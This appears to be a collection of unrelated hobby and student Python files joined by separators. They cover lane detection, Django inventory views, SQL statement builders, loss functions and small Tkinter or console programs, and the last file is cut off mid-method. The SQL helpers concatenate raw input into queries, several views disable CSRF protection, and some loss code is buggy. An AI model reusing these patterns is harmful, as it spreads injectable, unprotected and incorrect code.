warped = cv2.warpPerspective(img, M, img_size , flags=cv2.INTER_LINEAR)
return warped, M
def find_peaks(img,thresh):
img_half=img[int(img.shape[0]/2):,:,0]
data = np.sum(img_half, axis=0)
filtered = scipy.ndimage.filters.gaussian_filter1d(data,20)
xs = np.arange(len(filtered))
peak_ind = signal.find_peaks_cwt(filtered, np.arange(20,300))
peaks = np.array(peak_ind)
peaks = peaks[filtered[peak_ind]>thresh]
return peaks,filtered
def get_next_window(img,center_point,width):
"""
input: img,center_point,width
img: binary 3 channel image
center_point: center of window
width: width of window
output: masked,center_point
masked : a masked image of the same size. mask is a window centered at center_point
center : the mean ofall pixels found within the window
"""
ny,nx,_ = img.shape
mask = np.zeros_like(img)
if (center_point <= width/2):
center_point = width/2
if (center_point >= nx-width/2):
center_point = nx-width/2
left = center_point - width/2
right = center_point + width/2
vertices = np.array([[(left,0),(left,ny), (right,ny),(right,0)]], dtype=np.int32)
ignore_mask_color=(255,255,255)
cv2.fillPoly(mask, vertices, ignore_mask_color)
masked = cv2.bitwise_and(mask,img)
hist = np.sum(masked[:,:,0],axis=0)
if max(hist>10000):
center = np.argmax(hist)
else:
center = center_point
return masked,center
def lane_from_window(binary,center_point,width):
n_zones=6
ny,nx,nc = binary.shape
zones = binary.reshape(n_zones,-1,nx,nc)
zones = zones[::-1] # start from the bottom slice
window,center = get_next_window(zones[0],center_point,width)
for zone in zones[1:]:
next_window,center = get_next_window(zone,center,width)
window = np.vstack((next_window,window))
return window
# Define a class to receive the characteristics of each line detection
class Line:
def __init__(self,n=5):
# length of queue to store data
self.n = n
#number of fits in buffer
self.n_buffered = 0
# was the line detected in the last iteration?
self.detected = False
# x values of the last n fits of the line
self.recent_xfitted = deque([],maxlen=n)
#average x values of the fitted line over the last n iterations
self.avgx = None
# fit coeffs of the last n fits
self.recent_fit_coeffs = deque([],maxlen=n)
#polynomial coefficients averaged over the last n iterations
self.avg_fit_coeffs = None
# xvals of the most recent fit
self.current_fit_xvals = [np.array([False])]
#polynomial coefficients for the most recent fit
self.current_fit_coeffs = [np.array([False])]
#x values for detected line pixels
self.allx = None
#y values for detected line pixels
self.ally = None
#y values for line fit
self.fit_yvals = np.linspace(0, 100, num=101)*7.2 # always the same y-range as image
#radius of curvature of the line in some units
self.radius_of_curvature = None
# origin (pixels) of fitted line at the bottom of the image
self.line_pos = None
#distance in meters of vehicle center from the line
self.line_base_pos = None
#difference in fit coefficients between last and new fits
self.diffs = np.array([0,0,0], dtype='float')
def set_current_fit_xvals(self):
yvals = self.fit_yvals
self.current_fit_xvals = self.current_fit_coeffs[0]*yvals**2 + self.current_fit_coeffs[1]*yvals + self.current_fit_coeffs[2]
def add_data(self):
self.recent_xfitted.appendleft(self.current_fit_xvals)
self.recent_fit_coeffs.appendleft(self.current_fit_coeffs)
assert len(self.recent_xfitted)==len(self.recent_fit_coeffs)
self.n_buffered = len(self.recent_xfitted)
def pop_data(self):
if self.n_buffered>0:
self.recent_xfitted.pop()
self.recent_fit_coeffs.pop()
assert len(self.recent_xfitted)==len(self.recent_fit_coeffs)
self.n_buffered = len(self.recent_xfitted)
return self.n_buffered
def set_avgx(self):
fits = self.recent_xfitted
if len(fits)>0:
avg=0
for fit in fits:
avg +=np.array(fit)
avg = avg / len(fits)
self.avgx = avg
def set_avgcoeffs(self):
coeffs = self.recent_fit_coeffs
if len(coeffs)>0:
avg=0
for coeff in coeffs:
avg +=np.array(coeff)
avg = avg / len(coeffs)
self.avg_fit_coeffs = avg
def set_allxy(self,lane_candidate):
self.ally,self.allx = (lane_candidate[:,:,0]>254).nonzero()
def set_current_fit_coeffs(self):
self.current_fit_coeffs = np.polyfit(self.ally, self.allx, 2)
def get_diffs(self):
if self.n_buffered>0:
self.diffs = self.current_fit_coeffs - self.avg_fit_coeffs
else:
self.diffs = np.array([0,0,0], dtype='float')
def set_radius_of_curvature(self):
# Define y-value where we want radius of curvature (choose bottom of the image)
y_eval = max(self.fit_yvals)
if self.avg_fit_coeffs is not None:
self.radius_of_curvature = ((1 + (2*self.avg_fit_coeffs[0]*y_eval + self.avg_fit_coeffs[1])**2)**1.5) \
/np.absolute(2*self.avg_fit_coeffs[0])
def set_line_base_pos(self):
y_eval = max(self.fit_yvals)
self.line_pos = self.current_fit_coeffs[0]*y_eval**2 \
+self.current_fit_coeffs[1]*y_eval \
+ self.current_fit_coeffs[2]
basepos = 640
self.line_base_pos = (self.line_pos - basepos)*3.7/600.0 # 3.7 meters is about 600 pixels in the x direction
# here come sanity checks of the computed metrics
def accept_lane(self):
flag = True
maxdist = 2.8 # distance in meters from the lane
if(abs(self.line_base_pos) > maxdist ):
print('lane too far away')
flag = False
if(self.n_buffered > 0):
relative_delta = self.diffs / self.avg_fit_coeffs
# allow maximally this percentage of variation in the fit coefficients from frame to frame
if not (abs(relative_delta)<np.array([0.7,0.5,0.15])).all():
print('fit coeffs too far off [%]',relative_delta)
flag=False
return flag
def update(self,lane):
self.set_allxy(lane)
self.set_current_fit_coeffs()
self.set_current_fit_xvals()
self.set_radius_of_curvature()
self.set_line_base_pos()
self.get_diffs()
if self.accept_lane():
self.detected=True
self.add_data()
self.set_avgx()
self.set_avgcoeffs()
else:
self.detected=False
self.pop_data()
if self.n_buffered>0:
self.set_avgx()
self.set_avgcoeffs()
return self.detected,self.n_buffered
def get_binary_lane_image(img,line,window_center,width=300):
if line.detected:
window_center=line.line_pos
else:
peaks,filtered = find_peaks(img,thresh=3000)
if len(peaks)!=2:
print('Trouble ahead! '+ str(len(peaks)) +' lanes detected!')
plt.imsave('troublesome_image.jpg',img)
peak_ind = np.argmin(abs(peaks-window_center))
peak = peaks[peak_ind]
window_center = peak
lane_binary = lane_from_window(img,window_center,width)
return lane_binary
def project_lane_lines(img, mtx, dist, left_fitx,right_fitx,yvals):
# Create an image to draw the lines on
color_warp = np.zeros_like(img).astype(np.uint8)
# Recast the x and y points into usable format for cv2.fillPoly()
pts_left = np.array([np.transpose(np.vstack([left_fitx, yvals]))])
pts_right = np.array([np.flipud(np.transpose(np.vstack([right_fitx, yvals])))])
pts = np.hstack((pts_left, pts_right))
# Draw the lane onto the warped blank image
cv2.fillPoly(color_warp, np.int_([pts]), (0,255, 0))
undist = undistort(img, mtx, dist)
unwarp,Minv = warp(img,tobird=False)
# Warp the blank back to original image space using inverse perspective matrix (Minv)
newwarp = cv2.warpPerspective(color_warp, Minv, (img.shape[1], img.shape[0]))
# Combine the result with the original image
result = cv2.addWeighted(undist, 1, newwarp, 0.3, 0)
return result
def process_image(img, mtx, dist, left, right):
undist = undistort(img, mtx, dist)
binary,_ = binarize(undist)
warped,_ = warp(binary)
warped_binary = region_of_interest(warped)
window_center_l = 340
if left.detected:
window_center_l = left.line_pos
left_binary = get_binary_lane_image(warped_binary,left,window_center_l,width=300)
window_center_r = 940
if right.detected:
window_center_r = right.line_pos
right_binary = get_binary_lane_image(warped_binary,right,window_center_r,width=300)
detected_l,n_buffered_left = left.update(left_binary)
detected_r,n_buffered_right = right.update(right_binary)
left_fitx = left.avgx
right_fitx = right.avgx
yvals = left.fit_yvals
lane_width = 3.7
off_center = -100*round(0.5*(right.line_base_pos-lane_width/2) + 0.5*(abs(left.line_base_pos)-lane_width/2),2)
result = project_lane_lines(img, mtx, dist, left_fitx,right_fitx,yvals)
font = cv2.FONT_HERSHEY_SIMPLEX
str1 = str('distance from center: '+str(off_center)+'cm')
cv2.putText(result,str1,(430,630), font, 1,(0,0,255),2,cv2.LINE_AA)
if left.radius_of_curvature and right.radius_of_curvature:
curvature = 0.5*(round(right.radius_of_curvature/1000,1) + round(left.radius_of_curvature/1000,1))
str2 = str('radius of curvature: '+str(curvature)+'km')
cv2.putText(result,str2,(430,670), font, 1,(0,0,255),2,cv2.LINE_AA)
return result
def warp_pipeline(img, mtx, dist):
undist = undistort(img, mtx, dist)
result,_ = warp(undist)
result = region_of_interest(result)
return result
def warp_binarize_pipeline(img, mtx, dist):
undist = undistort(img, mtx, dist)
binary,_ = binarize(undist)
result,_ = warp(binary)
result = region_of_interest(result)
return result
|
from django.contrib import admin
from django.urls import path, re_path
from leads import views
from django.conf.urls import url
urlpatterns = [
path('admin/', admin.site.urls),
re_path(r'^api/leads/$', views.leads_list),
re_path(r'^api/leads/([0-9])$', views.leads_detail),
]
|
class Buffer:
# Конструктор без аргументов.
def __init__(self):
# Список, в который будет добавляться последовательность целых чисел.
self.current_part = []
# Добавляет следующую часть последовательности.
def add(self, *a):
# Расширяем список, добавляя в него элементы.
self.current_part.extend(a)
while len(self.current_part) - 5 >= 0:
# Выводим сумму первых 5-ти элементов списка.
print(sum(self.current_part[0:5]))
# Список принимает значения оставшихся элементов.
self.current_part = self.current_part[5:]
# Возвращает сохраненные в текущий момент элементы последовательности в
# порядке, в котором они были добавлены.
def get_current_part(self):
return self.current_part
buf = Buffer()
buf.add(1, 2, 3)
print(buf.get_current_part())
buf.add(4, 5, 6)
print(buf.get_current_part())
buf.add(7, 8, 9, 10)
print(buf.get_current_part())
buf.add(1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1)
print(buf.get_current_part())
|
from tornado import gen
from tornado.ioloop import IOLoop
from bokeh.server.server import Server
from bokeh.application.handlers import FunctionHandler
from bokeh.application import Application
import numpy as np
from bokeh.plotting import figure
from bokeh.models import ColumnDataSource
import fire
class BokehScope(object):
def __init__(self, curves, active):
self.io_loop = IOLoop.current()
self.bokeh_app = Application(FunctionHandler(self.modify_doc))
self.server = Server({'/': self.bokeh_app}, io_loop=self.io_loop)
self.colors = ['blue', 'red', 'green', 'magenta']
self.curves = curves
self.active = active
self.source = ColumnDataSource(data=self.curves.downsample())
self.busy = False
self.skip_update = False
def plot(self):
print('Opening Bokeh application on http://localhost:5006/')
self.server.start()
self.io_loop.add_callback(self.server.show, "/")
self.io_loop.start()
def modify_doc(self, doc):
plot = figure(plot_width=1400, title="Waveforms",
tools="xpan,xwheel_zoom,xbox_zoom,undo, redo, reset")
for i, c in enumerate(self.active):
plot.line(x='t', y=c, color=self.colors[i], source=self.source)
doc.add_root(plot)
@gen.coroutine
def update():
self.source.data = self.curves.downsample(
tlim=[plot.x_range.start, plot.x_range.end])
self.busy = False
def change_callback(attr, old, new):
if not self.busy:
self.busy = True
doc.add_next_tick_callback(update)
plot.x_range.on_change('end', change_callback)
def plot(folder, names, to_plot):
from . import parse
c = parse.CurveSet(folder, names)
try:
app = BokehScope(c, to_plot)
app.plot()
except KeyboardInterrupt:
exit()
pass
if __name__ == "__main__":
fire.Fire(plot) |
import PeruDB
import PeruConstants, CommonFunctions
def PersonInsertFromList(people):
resultString = ""
for person in people:
result = PersonInsertStatement(person)
if result == -1:
return result
resultString += result
return resultString
def PersonReadSingleStatement(PersonID):
return("SELECT * FROM PERSON WHERE " + PeruConstants.PERSON_ID + " = '" + str(PersonID) + "';\n")
def PersonInsertStatement(fields):
if len(fields) > len(PeruConstants.PERSON_FIELDS) or len(fields) < (len(PeruConstants.PERSON_FIELDS) - 1):
return [1,"Improper format"]
if len(fields) == (len(PeruConstants.PERSON_FIELDS) - 1):
return ("INSERT INTO " + PeruConstants.PERSON +
"(" + ",".join(PeruConstants.PERSON_FIELDS[1:]) + ")" +
" VALUES('" + "\',\'".join(fields) + "');\n")
else:
return "INSERT INTO " + PeruConstants.PERSON + " (" + ",".join(PeruConstants.PERSON_FIELDS[1:]) + ")" + " VALUES('" + "','".join(fields[1:]) + "');\n"
def PersonUpdateStatement(fields):
if len(fields) != len(PeruConstants.PERSON_FIELDS):
return -1
strFields = [(PeruConstants.PERSON_FIELDS[i] + " = '" + fields[i] + "'") for i in range(1, len(fields))]
return ("UPDATE PERSON" +
" SET " + ",".join(strFields) +
" WHERE " + PeruConstants.PERSON_FIELDS[0] + " = " + fields[0] + ";\n")
def PersonDeleteStatement(PersonID):
return("DELETE FROM PERSON WHERE " + PeruConstants.PERSON_FIELDS[0] + " = '" + str(PersonID) + "';\n")
def ReadPerson(PersonID):
database = PeruDB.PeruDB()
output = database.querry(PersonReadSingleStatement(PersonID));
database.closeDB()
return output
def InsertUpdatePerson(database, fields):
fields = CommonFunctions.FormatFields(fields)
if fields[0] != '':
return UpdatePerson(database, fields)
else:
return InsertPerson(database, fields)
def InsertPerson(database, fields):
output = database.insert(PersonInsertStatement(fields))
return output
def UpdatePerson(database, fields):
output = database.update(PersonUpdateStatement(fields))
if output[0] == 0:
output = [0, fields[0]]
return output
def DeletePerson(database, PersonID):
output = database.delete(PersonDeleteStatement(PersonID))
return output |
import sajilo
import sys
import os.path
if len(sys.argv) == 1:
#ask for the file if no file is provided
print("Usage: %s filename" % __file__)
else:
#get the file extension if file is provided.
ext = str(os.path.splitext(sys.argv[1])[1])
if ext == ".sajilo":
#execute the file if extension matches
with open(sys.argv[1]) as f:
sajilo.execute(f.read())
else:
print("Sajilo Compiler only supports .sajilo files!")
|
print('''Aprimore o Desafio 093 para que funcione com varios jogadores,
incluindo um sistema de visualização de detalhes do aproveitamento de
cada jogador.
''')
#captação de dados.txt
jogador = dict()
time = list()
print('{:=^50}'.format(' Gerenciamento de Aproveitamento '))
while True:
keep = '0'
jogador['Nome'] = input('Nome: ')
jogador['Partidas'] = int(input('Quantidade de partidas: '))
jogador['Gols'] = list()
for p in range(1, jogador['Partidas']+1):
jogador['Gols'].append(int(input(f'Quantidade de gols na {p}º partida: ')))
jogador['Gols totais'] = sum(jogador['Gols'])
time.append(jogador.copy())
while keep not in 'SsNn':
keep = input('Deseja continuar? [S/N] ').upper()[0]
if keep in 'Nn':
break
#print de tudo
print('{:=^50}'.format('Dados do Time'))
print('{: ^15}'.format('Codigo'), end='')
print('{: ^15}'.format('Nome'), end='')
print('{: ^15}'.format('Partidas'), end='')
print('{: ^15}'.format('Gols'), end='')
print('{: ^15}'.format('Gols Totais'))
contador = 0
for p in time:
contador += 1
print('{: ^15}'.format(contador), end='')
print('{: ^15}'.format(p['Nome']), end='')
print('{: ^15}'.format(p['Partidas']), end='')
print('{: ^15}'.format(str(p['Gols'])), end='')
print('{: ^15}'.format(p['Gols totais']))
#analise de dados.txt
while True:
select = int(input('Mostrar dados.txt de qual jogador? (999 para parar)'))
if select == 999:
break
while select > len(time):
select = int(input('Mostrar dados.txt de qual jogador? (999 para parar)'))
print('{:=^50}'.format(f'Levantamento do jogador {time[select-1]["Nome"]} '))
print(f'O jogador {time[select-1]["Nome"]} jogou {time[select-1]["Partidas"]} jogos e fez {str(time[select-1]["Gols totais"])} gols no total.')
for contador in range(0, len(time[select-1]["Gols"])):
print(f'No {contador+1}º jogo fez {time[select-1]["Gols"][contador]} gols')
# print(jogador) |
import eng
class Yamazaki:
name = 'Yamazaki'
#type = 'Item'
visible = True
aliases = ['yamazaki', 'Mr. Yamazaki', 'Genzo Yamazaki', 'Japanese businessman']
descriptions = {'desc': "You see an Japanese businessman dressed in formal attire. ",
'intro':'Hajimemashite, I am Genzo Yamazaki. I am COO at Matsui Corp."',
'converse':"YOU: I am ... I work at the Old Money Corporation in Finance. Yamazaki: Nice to meet you. Here is my business card. ",
'shock': "Please sir do not touch me, it is not appropriate as business partners. "}
properties = {'conversation':False}
def look(self):
self.visible = True
return self.descriptions['desc']
def talk(self):
if self.properties['conversation']:
currRoom = eng.getCurrentRoom()
meishi = eng.getItemByName('business card')
if meishi is not None:
meishi.visible = True
if meishi.properties['have'] == False:
meishi.properties['have'] = True
eng.addToInventory(meishi)
return self.descriptions['converse']
else:
self.properties['conversation'] = True
return self.descriptions['intro']
def touch(self):
return self.descriptions['shock']
yamazaki = Yamazaki()
eng.setupItem(yamazaki)
|
# ディクショナリ
scores = {
"山田" : 90,
"高橋" : 100,
"山本" : 70,
"田中" : 85,
"坂本" : 55
}
# 変数初期化
total = 0
# 計算
for score in scores.values():
total += score
ave = total / len(scores)
# 1回目の表示
print("合計:" + str(total) + "点")
print("平均:" + str(ave)+ "点")
# 辞書に"中田"を追加
scores["中田"] = 95
# 計算
total += scores["中田"]
ave = total / len(scores)
# 2回目の表示
print("合計:" + str(total) + "点")
print("平均:" + str(ave)+ "点")
|
# coding=utf-8
import json
from decimal import Decimal
import sys
from django.core import serializers
from datetime import datetime
from django.http import JsonResponse
from django.shortcuts import render
from django.views.decorators.csrf import csrf_exempt
from laboratorio import views_nivel_insumos
from laboratorio.modelos_vista import Convertidor, ProductoVista
from laboratorio.models import Producto, Tipo, Usuario, OrdenPedido, Bodega, DetalleOrden, ProductoReposicionPendiente
"""
SA-LCINV-16: Método para navegar hacia el modal
que permite guardar el detalle de la orden de reposición.
"""
def ir_modal_or(request):
return render(request, "laboratorio/modal_orden_reposicion.html")
"""
SA-LCINV-16: Método que crea la orden automática de
reposición como una orden de pedido, se recibe el id
del producto o se obtiene de la sesión proveniente
de un ejecución previa de transacción.
"""
@csrf_exempt
def crearOrdenPedido(request):
if request.method == 'GET' and 'id' in request.GET:
id = request.GET['id']
orden_pedido = crearOrden(id=id)
request.session['producto_id'] = id
request.session['orden_pedido_id'] = orden_pedido.id
mensaje = "ok"
else:
pk_producto = request.session.get('producto_id', None)
print >> sys.stdout, 'ID PRODUCTO crear' + str(request.session.get('producto_id', None))
orden_pedido = crearOrden(id=pk_producto)
mensaje = "ok"
request.session['orden_pedido_id'] = orden_pedido.id
return JsonResponse({'mensaje':mensaje})
"""
SA-LCINV-16: Método que obtiene la información de un producto
cuyo id se encuentra guardado en la sesión actual.
"""
@csrf_exempt
def obtenerInfoProducto(request):
pk_producto = request.session.get('producto_id', None)
pk_orden = request.session.get('orden_pedido_id', None)
print >> sys.stdout, 'ID PRODUCTO info' + str(request.session.get('producto_id', None)) + ' '+ str(request.session.get('orden_pedido_id', None))
if pk_producto != None and pk_orden != None:
producto = Producto.objects.get(id=pk_producto)
prod_json = json.loads(serializers.serialize('json', [producto]))
return JsonResponse({'producto':prod_json, 'pk_orden':pk_orden}, safe=False)
"""
SA-LCINV-16: Método que guarda el detalle de una orden
de reposición, se encarga tambien de cambiar el estado
de guardado de detalle para la orden pendiente.
"""
@csrf_exempt
def guardarDetalleOrdenReposicion(request):
mensaje = ""
if request.method == "POST":
pk_producto = request.POST.get('producto', None)
print >> sys.stdout, str(pk_producto)
pk_orden = request.session.get('orden_pedido_id', None)
fecha_movimiento = request.POST.get('fecha_movimiento', None)
cantidad = request.POST.get('cantidad', None)
if pk_producto != None and pk_orden != None and fecha_movimiento != None and cantidad != None:
producto = Producto.objects.get(id=pk_producto)
orden = OrdenPedido.objects.get(id=pk_orden)
fecha = datetime.strptime(fecha_movimiento, '%c')
cant = Decimal(cantidad)
detalle = DetalleOrden()
detalle.fecha_movimiento = fecha
detalle.producto = producto
detalle.cantidad = cant
detalle.estado = Tipo.objects.filter(grupo="DETALLEPEDIDO", nombre="Recibido").first()
detalle.orden = orden
detalle.save()
if ProductoReposicionPendiente.objects.filter(producto_id=pk_producto).exists() == True:
prodRes = ProductoReposicionPendiente.objects.get(producto_id=pk_producto)
prodRes.detalle_orden_guardada = True
prodRes.save()
mensaje = "ok"
else:
mensaje = "Todos los campos deben ser diligenciados."
return JsonResponse({'mensaje':mensaje})
"""
SA-LCINV-16: Método que retorna la fecha de petición de la orden de
reposición almacenada por sesion.
"""
@csrf_exempt
def fechaPeticionOrdenReposicion(request):
pk_orden = request.session.get('orden_pedido_id', None)
if pk_orden != None:
orden = OrdenPedido.objects.get(id=pk_orden)
fechaPeticion = orden.fecha_peticion.strftime('%c')
return JsonResponse({"fecha": fechaPeticion})
"""
SA-LCINV-16: Método que guarda un registro en BD para tener
la notificación pendiente de orden de reposición.
"""
@csrf_exempt
def guardarNotificacionOrden(request):
if request.method == 'GET' and 'id' in request.GET:
id = request.GET['id']
json_res = guardarDetalle(id=id)
return json_res
else:
pk_producto = request.session.get('producto_id', None)
json_res = guardarDetalle(id=pk_producto)
return json_res
"""
SA-LCINV-16: Método que retorna todos los productos pendientes de
reposición.
"""
@csrf_exempt
def obtenerProductosPendienteReposicion(request):
productos = ProductoReposicionPendiente.objects.all()
listaProductos = []
for producto in productos:
produc = Producto.objects.get(id=producto.producto_id)
prod = ProductoVista()
prod.id = produc.id
prod.codigo = produc.codigo
prod.nombre = produc.nombre
prod.descripcion = produc.descripcion
prod.valorUnitario = str(produc.valorUnitario)
prod.unidadesExistentes = str(produc.unidadesExistentes)
prod.clasificacion = produc.get_clasificacion_display()
prod.unidad_medida = produc.unidad_medida.nombre
prod.unidad_unitaria = str(produc.unidad_unitaria)
prod.imageFile = str(produc.imageFile)
prod.proveedor = produc.proveedor.first_name
codigo_color = views_nivel_insumos.nivel_insumo_tabla(produc.id, produc.punto_pedido)
prod.codigo_color = str(producto.detalle_orden_guardada)
prod.punto_pedido = str(produc.punto_pedido)
prod.nivel_actual = str(codigo_color[1])
listaProductos.append(prod)
json_string = json.dumps(listaProductos, cls=Convertidor)
return JsonResponse({'productos':json_string})
"""
SA-LCINV-16: Metodo que se encarga de crear el registro en la tabla
de productos pendientes de reposición.
"""
def guardarDetalle(id):
if id != None and ProductoReposicionPendiente.objects.filter(producto_id=id).exists() == False:
producto = Producto.objects.get(id=id)
productoReposicion = ProductoReposicionPendiente()
productoReposicion.producto = producto
productoReposicion.detalle_orden_guardada = False
productoReposicion.save()
return JsonResponse({'mensaje': 'ok'})
else:
return JsonResponse({'mensaje': 'YaExisteOrden'})
"""
SA-LCINV-16: Método que crea la orden de reposición directamente
creando un registro en la BD tabla orden_pedido.
"""
def crearOrden(id):
if id != None:
producto = Producto.objects.get(id=id)
proveedor = producto.proveedor
fecha_actual = datetime.now()
estado = Tipo.objects.get(nombre="Ingresada")
usuario_creacion = Usuario.objects.filter(is_superuser=False).exclude(roles__nombre='Proveedor').first()
observaciones = "Orden de Reposición por nivel mínimo generada automáticamente."
orden_pedido = OrdenPedido(fecha_peticion=fecha_actual,
estado=estado,
usuario_creacion=usuario_creacion,
proveedor=proveedor,
observaciones=observaciones)
orden_pedido.save()
return orden_pedido
|
from segmentation_models.base import Loss
from segmentation_models.base import functional as F
import segmentation_models as sm
import keras.backend as K
import tensorflow as tf
class L1Loss(Loss):
def __init__(self):
super().__init__(name='l1')
def __call__(self, gt, pr):
return l1(gt, pr, **self.submodules)
class L2Loss(Loss):
def __init__(self):
super().__init__(name='l2')
def __call__(self, gt, pr):
return l2(gt, pr, **self.submodules)
class TverskyLoss(Loss):
def __init__(self, alpha=0.5):
super().__init__(name='tversky')
self.alpha = alpha
def __call__(self, gt, pr):
return 1 - tversky(gt, pr, alpha=self.alpha, **self.submodules)
class TverskyFocalLoss(Loss):
def __init__(self, alpha=0.5, gamma=2.0):
super().__init__(name='tverskyfocal')
self.alpha = alpha
self.gamma = gamma
def __call__(self, gt, pr):
tverloss = 1 - tversky(gt, pr, alpha=self.alpha, **self.submodules)
return K.pow(tverloss, self.gamma)
class WeightedBinaryCE(Loss):
def __init__(self, alpha=0.5):
super().__init__(name='weightedBCE')
self.alpha = alpha
def __call__(self, gt, pr):
return weightedBCE(gt, pr, alpha=self.alpha, **self.submodules)
class ComboLoss(Loss):
def __init__(self, alpha=0.5, beta=0.5):
super().__init__(name='combo')
self.alpha = alpha
self.beta = beta
def __call__(self, gt, pr):
return alpha * modifiedCE(gt, pr, beta=self.beta, **self.submodules) - (1-alpha) * F.fscore(gt, pr, **self.submodules)
class SimpleSSLoss(Loss):
def __init__(self, alpha=0.5):
super().__init__(name='simplessl')
self.alpha = alpha
def __call__(self, gt, pr):
return 1 - 0.5 * (self.alpha * sensitivity(gt, pr, **self.submodules) + (1-self.alpha) * specificity(gt, pr, **self.submodules))
def l1(gt, pr, **kwargs):
backend = kwargs['backend']
return backend.mean(backend.abs(gt-pr))
def l2(gt, pr, **kwargs):
backend = kwargs['backend']
return backend.mean(backend.square(gt-pr))
def tversky(gt, pr, alpha=0.5, **kwargs):
backend = kwargs['backend']
alpha = alpha # penalty for false positive
beta = 1 - alpha # penalty for false negative
smooth = 1e-6
tp = backend.sum(gt * pr)
fp = backend.sum((1-gt) * pr)
fn = backend.sum(gt * (1-pr))
tversky = (tp + smooth) / (tp + alpha * fp + beta * fn + smooth)
return tversky
def weightedBCE(gt, pr, alpha=0.5, **kwargs):
backend = kwargs['backend']
smooth = 1e-6
return -tf.reduce_sum(alpha*gt*backend.log(pr+smooth) + (1-alpha)*(1-gt)*backend.log(1-pr+smooth))
def modifiedCE(gt, pr, beta=0.5, **kwargs):
backend = kwargs['backend']
beta = beta
smooth=1e-6
return -backend.reduce_sum(beta*(gt - backend.log(pr)) + (1-beta)*(1-gt)*backend.log(1-pr))
def sensitivity(gt, pr, **kwargs):
backend = kwargs['backend']
smooth = 1e-6
tp = backend.sum(gt * pr)
tn = backend.sum((1-gt) * (1-pr))
fp = backend.sum((1-gt) * pr)
fn = backend.sum(gt * (1-pr))
return tp / (tp + fn)
def specificity(gt, pr, **kwargs):
backend = kwargs['backend']
smooth = 1e-6
tp = backend.sum(gt * pr)
tn = backend.sum((1-gt) * (1-pr))
fp = backend.sum((1-gt) * pr)
fn = backend.sum(gt * (1-pr))
return tn / (fp + tn) |
from tkinter import *
from functools import partial
import Mainwindow
import class_gallons
class SeauWindow:
def __init__(self, nbrSeau, tailles, final, initial):
self._contenu = []
self._first = True
self._select = -1
self._tailles = tailles
self.Seau_w = ""
self._final = final
self._initial = initial
self.nbrSeau = nbrSeau
self.update_list=[]
self.pop =""
self.size_w = str(240*nbrSeau) + 'x350'
self.coup = 0
for i in range(0, nbrSeau):
self._contenu.append(initial[i] * tailles[i])
self.launch()
def launch(self):
self.Seau_w = Tk()
self.Seau_w.title('Jeu des Seaux')
self.Seau_w.geometry(self.size_w)
self.center(self.Seau_w)
photo = PhotoImage(file='img/seau.gif')
for i in range(1, self.nbrSeau + 1):
self.Seau_w.columnconfigure(i, weight=1)
Button(image=photo, command=partial(self.vide, i - 1)).grid(row=0, column=i)
self.Seau_w.rowconfigure(0, weight=1)
self.Seau_w.rowconfigure(1, weight=1)
self.Seau_w.rowconfigure(2, weight=1)
for i in range(0, self.nbrSeau):
self.update_list.append(StringVar())
labelfont = ('comic', 28, 'bold')
lab = Label(textvariable=self.update_list[i], relief=RAISED, )
lab.config(font=labelfont)
lab.grid(row=1, column=i + 1)
self.update_list[i].set(str(self._contenu[i]) + "/" + str(self._tailles[i]))
button_retour = Button(text="Retour", command=self.retour_button)
button_retour.grid(row=2, column=self.nbrSeau)
self.Seau_w.mainloop()
return
def retour_button(self):
self.Seau_w.destroy()
self._contenu = []
Mainwindow.mainwindow()
return
def retour_pop(self):
self.pop.destroy()
self.retour_button()
return
def center(self, toplevel):
toplevel.update_idletasks()
# Tkinter way to find the screen resolution
screen_width = toplevel.winfo_screenwidth()
screen_height = toplevel.winfo_screenheight()
size = tuple(int(_) for _ in toplevel.geometry().split('+')[0].split('x'))
x = screen_width / 2 - size[0] / 2
y = screen_height / 2 - size[1] / 2
toplevel.geometry("+%d+%d" % (x, y))
return
def vide(self, indice):
if self._first:
self._select = indice
self._first = False
else:
if indice != self._select:
self.coup = self.coup+1
reste = self._tailles[indice] - (self._contenu[indice] + self._contenu[self._select])
if reste >= 0:
self._contenu[indice] = self._contenu[indice] + self._contenu[self._select]
self._contenu[self._select] = 0
else:
self._contenu[indice] = self._tailles[indice]
self._contenu[self._select] = -reste
self._first = True
for i in range(0, self.nbrSeau):
self.update_list[i].set(str(self._contenu[i]) + "/" + str(self._tailles[i]))
self.test()
return
def test(self):
for i in range (0,self.nbrSeau):
if self._contenu[i] == self._final:
# lancer un self.popup
self.pop = Tk()
self.pop.title('Jeu des Seaux')
self.pop.geometry('350x350')
self.center(self.pop)
self.pop.columnconfigure(0, weight=1)
self.pop.rowconfigure(0, weight=1)
self.pop.rowconfigure(1, weight=2)
Label(self.pop, text="Vous avez gagné en " +str(self.coup)+" félicitation").grid(row=0, column=0)
Button(self.pop, text="Exit", command=self.retour_pop).grid(row=1, column=0)
return
class parametreSeau:
def __init__(self):
# reste a faire la fenetre pour les paramètre
self.parametre = Tk()
self.parametre.title('Jeu des Seaux')
self.parametre.geometry('700x350')
self.center(self.parametre)
self.pop =""
self.parametre.columnconfigure(0, weight=1)
self.parametre.columnconfigure(1, weight=1)
self.parametre.rowconfigure(0, weight=1)
self.parametre.rowconfigure(1, weight=1)
self.parametre.rowconfigure(2, weight=1)
self.parametre.rowconfigure(3, weight=1)
self.parametre.rowconfigure(4, weight=1)
self.nbrSeau = 5
self.tailles = [1, 2, 3, 4, 5]
self.final = 4
self.initial = [1, 1, 1, 1, 0]
button_retour = Button(text="Valider", command=self.check_button, width=10)
button_retour.grid(row=4, column=1)
Label(text="Nombre de seau :").grid(row=0, column=0)
Label(text="Tailles des seau (exemple pour 5 seau : 1;2;3;5;8) :").grid(row=1, column=0)
Label(text="But a atteindre :").grid(row=2, column=0)
Label(text="Remplissage initial (0 pour vide et 1 pour plein) :").grid(row=3, column=0)
self.entry_nbrS = StringVar()
Entry(textvariable=self.entry_nbrS, width=40).grid(row=0, column=1)
self.entry_nbrS.set("5")
self.entry_tailles = StringVar()
Entry(textvariable=self.entry_tailles, width=40).grid(row=1, column=1)
self.entry_tailles.set("1;2;3;5;8")
self.entry_final = StringVar()
Entry(textvariable=self.entry_final, width=40).grid(row=2, column=1)
self.entry_final.set("4")
self.entry_initial = StringVar()
Entry(textvariable=self.entry_initial, width=40).grid(row=3, column=1)
self.entry_initial.set("1;1;1;1;0")
return
def launch(self):
self.parametre = Tk()
self.parametre.title('Jeu des Seaux')
self.parametre.geometry('700x350')
self.center(self.parametre)
self.pop =""
self.parametre.columnconfigure(0, weight=1)
self.parametre.columnconfigure(1, weight=1)
self.parametre.rowconfigure(0, weight=1)
self.parametre.rowconfigure(1, weight=1)
self.parametre.rowconfigure(2, weight=1)
